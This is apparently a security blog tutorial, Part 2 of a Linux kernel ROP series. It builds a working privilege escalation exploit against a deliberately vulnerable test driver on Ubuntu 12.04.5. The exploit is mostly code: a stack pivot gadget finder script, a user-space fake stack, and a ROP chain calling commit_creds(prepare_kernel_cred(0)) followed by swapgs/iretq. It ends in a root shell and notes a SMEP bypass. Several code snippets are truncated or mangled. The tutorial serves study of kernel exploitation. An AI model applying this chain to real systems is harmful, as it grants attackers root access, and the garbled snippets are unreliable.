Linux Kernel ROP - Ropping your way to # (Part 2)


In Part 1 of this tutorial, we have demonstrated how to find useful ROP gadgets and build a privilege escalation ROP chain for our test system (3.13.0-32 kernel - Ubuntu 12.04.5 LTS). We have also developed a vulnerable kernel driver that allowed arbitrary code execution. In this part, we will use this kernel module to demonstrate the ROP chain in practice: escalate privileges, fixate the system and perform a clean "exit" to user space.

The following is a list of requirements for the ROP chain from Part 1:

  • Execute a privilege escalation payload
  • Data residing in user space may be referenced (i.e., "fetching" data from user space is allowed)
  • Instructions residing in user space may not be executed

The vulnerable kernel module demonstrated in Part 1 allowed setting a function pointer to an arbitrary memory address due to the missing offset bound checks. Our simple trigger code is shown below for reference:

#define DEVICE_PATH "/dev/vulndrv"

int main(int argc, char **argv) {
        int fd;
        struct drv_req req;

        req.offset = atoll(argv[1]);

        fd = open(DEVICE_PATH, O_RDONLY);

        if (fd == -1) {

        ioctl(fd, 0, &req;);

        return 0;

In the code snippet above, we control the request offset value which is declared as unsigned long in our vulnerable kernel module. Using this offset value, we can reference any kernel or user-space memory address.

Stack Pivot

Since we cannot redirect kernel control flow to a user-space address, we need to look for a suitable gadget in kernel space. The idea is to prepare our ROP chain in user space and then set the stack pointer to the beginning of this ROP chain. That way, we are not executing instructions residing in user space directly but rather fetching pointers from user space to instructions in kernel space.

Setting the breakpoint at the entry point to our vulnerable function device_ioctl(), we can examine registers that are either 'static' (have a somewhat fixed value between device_ioctl() invocations) or registers that we control before dereferencing the function pointer:

0xffffffffa013d0bd <device_ioctl>       nopl   0x0(%rax,%rax,1) 
0xffffffffa013d0c2 <device_ioctl+5>     push   %rbp
0xffffffffa013d0c3 <device_ioctl+6>     mov    %rsp,%rbp
0xffffffffa013d0c6 <device_ioctl+9>     sub    $0x30,%rsp
0xffffffffa013d0ca <device_ioctl+13>    mov    %rdi,-0x18(%rbp)
0xffffffffa013d0ce <device_ioctl+17>    mov    %esi,-0x1c(%rbp)
0xffffffffa013d0d1 <device_ioctl+20>    mov    %rdx,-0x28(%rbp)           [user-space address of passed req struct]
0xffffffffa013d0d5 <device_ioctl+24>    mov    -0x1c(%rbp),%eax
0xffffffffa013d0d8 <device_ioctl+27>    test   %eax,%eax
0xffffffffa013d0da <device_ioctl+29>    jne    0xffffffffa013d145 <device_ioctl+136>
0xffffffffa013d0dc <device_ioctl+31>    mov    -0x28(%rbp),%rax
0xffffffffa013d0e0 <device_ioctl+35>    mov    %rax,-0x10(%rbp)           [save req struct address to -0x10(%rbp)]
0xffffffffa013d0e4 <device_ioctl+39>    mov    -0x10(%rbp),%rax
0xffffffffa013d0e8 <device_ioctl+43>    mov    (%rax),%rax
0xffffffffa013d0eb <device_ioctl+46>    mov    %rax,%rsi
0xffffffffa013d0ee <device_ioctl+49>    mov    $0xffffffffa013e066,%rdi
0xffffffffa013d0f5 <device_ioctl+56>    mov    $0x0,%eax
0xffffffffa013d0fa <device_ioctl+61>    callq  0xffffffff81746ca3
0xffffffffa013d0ff <device_ioctl+66>    mov    -0x10(%rbp),%rax
0xffffffffa013d103 <device_ioctl+70>    mov    (%rax),%rax
0xffffffffa013d106 <device_ioctl+73>    shl    $0x3,%rax
0xffffffffa013d10a <device_ioctl+77>    add    $0xffffffffa013f340,%rax
0xffffffffa013d110 <device_ioctl+83>    mov    %rax,%rsi
0xffffffffa013d113 <device_ioctl+86>    mov    $0xffffffffa013e074,%rdi
0xffffffffa013d11a <device_ioctl+93>    mov    $0x0,%eax
0xffffffffa013d11f <device_ioctl+98>    callq  0xffffffff81746ca3
0xffffffffa013d124 <device_ioctl+103>   mov    $0xffffffffa013f340,%rdx      mov    -0x10(%rbp),%rax              mov    (%rax),%rax
0xffffffffa013d132 <device_ioctl+117>   shl    $0x3,%rax
0xffffffffa013d136 <device_ioctl+121>   add    %rdx,%rax                     mov    %rax,-0x8(%rbp)
0xffffffffa013d13d <device_ioctl+128>   mov    -0x8(%rbp),%rax
0xffffffffa013d141 <device_ioctl+132>   callq  *%rax                         jmp    0xffffffffa013d146 <device_ioctl+137>
0xffffffffa013d145 <device_ioctl+136>   nop
0xffffffffa013d146 <device_ioctl+137>   mov    $0x0,%eax
0xffffffffa013d14b <device_ioctl+142>   leaveq
0xffffffffa013d14c <device_ioctl+143>   retq

In [1], the $rax register contains the address of the instruction to be executed. We can compute this address in advance since we know both the ops array base address and the passed offset value used to compute the address of the function pointer fn(). For example, given the ops base address 0xffffffffaaaaaaaf and offset = 0x6806288, the fn address becomes 0xffffffffdeadbeef.

We can reverse this logic and try to find the offset value that would give us the desired target address to execute in kernel space. There are many stack pivot gadgets. For example, the following are common stack pivots encountered in user-space ROP chains:

  • mov %rsp, %rXx ; ret
  • add %rsp, ...; ret
  • xchg %rXx, %rsp ; ret

Using arbitrary code execution in kernel space, we need to set our stack pointer to a user-space address that we control. Even though our test environment is 64-bit, we're interested in the last stack pivot gadget but with 32-bit registers, i.e., xchg %eXx, %esp ; ret or xchg %esp, %eXx ; ret. In case our $rXx contains a valid kernel memory address (e.g., 0xffffffffXXXXXXXX), this stack pivot instruction will set the lower 32 bits of $rXx (0xXXXXXXXX which is a user-space address) as the new stack pointer. Since the $rax value is known right before executing fn(), we know exactly where our new user-space stack will be and mmap it accordingly.

Using the ROPGadget tool from Part 1, we can see that there are many suitable xchg stack pivots in the kernel image:

0xffffffff81000085 : xchg eax, esp ; ret
0xffffffff81576254 : xchg eax, esp ; ret 0x103d
0xffffffff810242a6 : xchg eax, esp ; ret 0x10a8
0xffffffff8108e258 : xchg eax, esp ; ret 0x11e8
0xffffffff81762182 : xchg eax, esp ; ret 0x12eb
0xffffffff816f4a04 : xchg eax, esp ; ret 0x13e9
0xffffffff81a196fc : xchg eax, esp ; ret 0x1408
0xffffffff814bd0fd : xchg eax, esp ; ret 0x148
0xffffffff8119e39b : xchg eax, esp ; ret 0x148d
0xffffffff813f8ce5 : xchg eax, esp ; ret 0x14c
0xffffffff810db968 : xchg eax, esp ; ret 0x14ff
0xffffffff81d5953e : xchg eax, esp ; ret 0x1589
0xffffffff81951aee : xchg eax, esp ; ret 0x1d07
0xffffffff81703efe : xchg eax, esp ; ret 0x1f3c

The only caveat when choosing a stack pivot gadget is that it needs to be aligned by 8 bytes (since the ops is the array of 8 byte pointers and its base address is properly aligned). The following simple script can be used to find a suitable gadget:

==================== ====================
#!/usr/bin/env python
import sys

base_addr = int(sys.argv[1], 16)

f = open(sys.argv[2], 'r') # gadgets

for line in f.readlines():
        target_str, gadget = line.split(':')
        target_addr = int(target_str, 16)

        # check alignment
        if target_addr % 8 != 0:

        offset = (target_addr - base_addr) / 8
        print 'offset =', (1 << 64) + offset
        print 'gadget =', gadget.strip()
        print 'stack addr = %x' % (target_addr & 0xffffffff)

vnik@ubuntu:~$ cat ropgadget | grep ': xchg eax, esp ; ret' > gadgets
vnik@ubuntu:~$ ./ 0xffffffffa0224340 ./gadgets
offset = 18446744073644332003
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

The stack address above represents the user-space address where the ROP chain needs to mmaped (fake_stack):

unsigned long *fake_stack;

mmap_addr = stack_addr & 0xfffff000;
assert((mapped = mmap((void*)mmap_addr, 0x2000, PROT_EXEC|PROT_READ|PROT_WRITE,
	MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)mmap_addr);

fake_stack = (unsigned long *)(stack_addr);
*fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

The ret instruction in the chosen stack pivot has a numeric operand. The ret instruction with no argument pops the return address off the stack and jumps to it. However, in some calling conventions (e.g., Microsoft __stdcall), the callee function is responsible for cleaning up the stack. In this case, the ret is called with an operand that represents the number of bytes to pop off the stack after fetching the next instruction. Hence, the second ROP gadget after the stack pivot is positioned at the offset 0x11e8 + 8: once the stack pivot is executed, the control will be transferred to the next gadget but the stack pointer will be at $rsp + 0x11e8.


Referring to the stack layout from Part 1, we can prepare the ROP chain in user space as follows:

fake_stack = (unsigned long *)(stack_addr);

*fake_stack ++= 0xffffffff810c9ebdUL;   /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

*fake_stack ++= 0x0UL;                  /* NULL */
*fake_stack ++= 0xffffffff81095430UL;   /* prepare_kernel_cred() */
*fake_stack ++= 0xffffffff810dc796UL;   /* pop %rdx; ret */
//*fake_stack ++= 0xffffffff81095190UL; /* commit_creds() */
*fake_stack ++= 0xffffffff81095196UL;   /* commit_creds() + 2 instructions */
*fake_stack ++= 0xffffffff81036b70UL;   /* mov %rax, %rdi; call %rdx */

We've made some modifications to the ROP chain from Part 1. In particular, the commit_creds() address was shifted by 2 instructions. The reason for this is that we're using the call instruction to execute commit_creds(). The call instruction saves the return address on the stack prior to transferring control to the first instruction of commit_creds(). As any other function, commit_creds has prologue and epilogue that will push values on the stack and then pop them off the stack before returning. Hence, once the function is executed, the control will be transferred to the saved return address. We, however, want to transfer it to the next gadget in the ROP chain. To use the call instruction as the ROP gadget, we can simply skip one of the push instructions in the prologue:

(gdb) x/10i 0xffffffff81095190
0xffffffff81095190      nopl   0x0(%rax,%rax,1)
0xffffffff81095195      push   %rbp
0xffffffff81095196      mov    %rsp,%rbp
0xffffffff81095199      push   %r13
0xffffffff8109519b      mov    %gs:0xc7c0,%r13
0xffffffff810951a4      push   %r12
0xffffffff810951a6      push   %rbx
0xffffffff810951a7      mov    %rdi,%rbx
0xffffffff810951aa      sub    $0x8,%rsp
0xffffffff810951ae      mov    0x498(%r13),%r12

Skipping push $rbp (and the first nop) allows as to use the call instruction as the ROP gadget: the saved return address on the stack will be popped by commit_creds() epilogue and ret will transfer control to the next gadget in the chain.


The ROP chain described above will give our calling process superuser privileges. However, once all ROP gadgets are executed, the control will be transferred to the next instruction on the stack which is some uninitialised memory value. We need to somehow restore the stack pointer and transfer control back to our user-space process.

You might be aware that syscalls switch kernel/user space context all the time. Once the process executes a syscall, it needs to restore its state so that it can continue executing from the next instruction after the syscall. This is typically done using the iret (inter-privilege return) instruction to return from kernel space back to the user-space process. However, iret (or iretq with 64-bit operands in our case) expects a certain stack layout shown below:


We would need to extend our ROP chain to include a new user-space instruction pointer (RIP), mmaped user-space stack pointer (RSP), code and stack segment selectors (CS and SS), and EFLAGS register with various state information. The CS, SS and EFLAGS values can be obtained from the calling user-space process using the following save_state() function:

unsigned long user_cs, user_ss, user_rflags;

static void save_state() {
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");

The address of the iretq instruction in the kernel .text segment can be obtained using objdump:

vnik@ubuntu:~# objdump -j .text -d ~/vmlinux | grep iretq | head -1
ffffffff81053056:       48 cf                   iretq  

The last thing to note is that before executing iret, swapgs is required on 64-bit systems. This instruction swaps the contents of the GS register with a value in one of the MSRs. At the entry to a kernel-space routine (e.g., a syscall), swpags is executed to obtain a pointer to kernel data structures and hence, a matching swapgs is required before returning to user space.

We can now put all the pieces of the ROP chain together:


fake_stack = (unsigned long *)(stack_addr);

*fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

*fake_stack ++= 0x0UL;                  /* NULL */
*fake_stack ++= 0xffffffff81095430UL;   /* prepare_kernel_cred() */
*fake_stack ++= 0xffffffff810dc796UL;   /* pop %rdx; ret */
*fake_stack ++= 0xffffffff81095196UL;   /* commit_creds() + 2 instructions */
*fake_stack ++= 0xffffffff81036b70UL;   /* mov %rax, %rdi; call %rdx */

*fake_stack ++= 0xffffffff81052804UL;   /* swapgs ; pop rbp ; ret */
*fake_stack ++= 0xdeadbeefUL;           /* dummy placeholder */

*fake_stack ++= 0xffffffff81053056UL;   /* iretq */
*fake_stack ++= (unsigned long)shell;   /* spawn a shell */
*fake_stack ++= user_cs;                /* saved CS */
*fake_stack ++= user_rflags;            /* saved EFLAGS */
*fake_stack ++= (unsigned long)(temp_stack+0x5000000);  /* mmaped stack region in user space */
*fake_stack ++= user_ss;                /* saved SS */


The complete exploit for Ubuntu 12.04.5 (x64) can be found on GitHub. First, we need to obtain the array offset using the base address:

vnik@ubuntu:~$ dmesg | grep addr | grep ops
[  244.142035] addr(ops) = ffffffffa02e9340
vnik@ubuntu:~$ ~/ ffffffffa02e9340 ~/gadgets 
offset = 18446744073644231139
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

Then, pass the base and offset addresses to the ROP exploit:

vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
array base address = 0xffffffffa02e9340
stack address = 0x8108e258
# id    
uid=0(root) gid=0(root) groups=0(root)

And did we mention that this would bypass SMEP? :) There are easier ways to bypass SMEP. For example, clearing the CR4 bit as a ROP chain gadget and then executing the rest of the privilege escalation payload (i.e., commit_creds(prepare_kernel_cred(0)) with iret) in user space. The goal of this tutorial was not to bypass a certain protection mechanism but to demonstrate that kernel ROP (the entire payload) can be as easily executed in kernel space as ROP in user space. There are obvious downsides to kernel ROP: the main one is being able to obtain access to the kernel boot image (which defaults to 0600). This is not an issue for stock kernels but could be problematic for custom kernels if there are no other memory leaks.

If you have any comments, corrections or questions, you can post them below.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.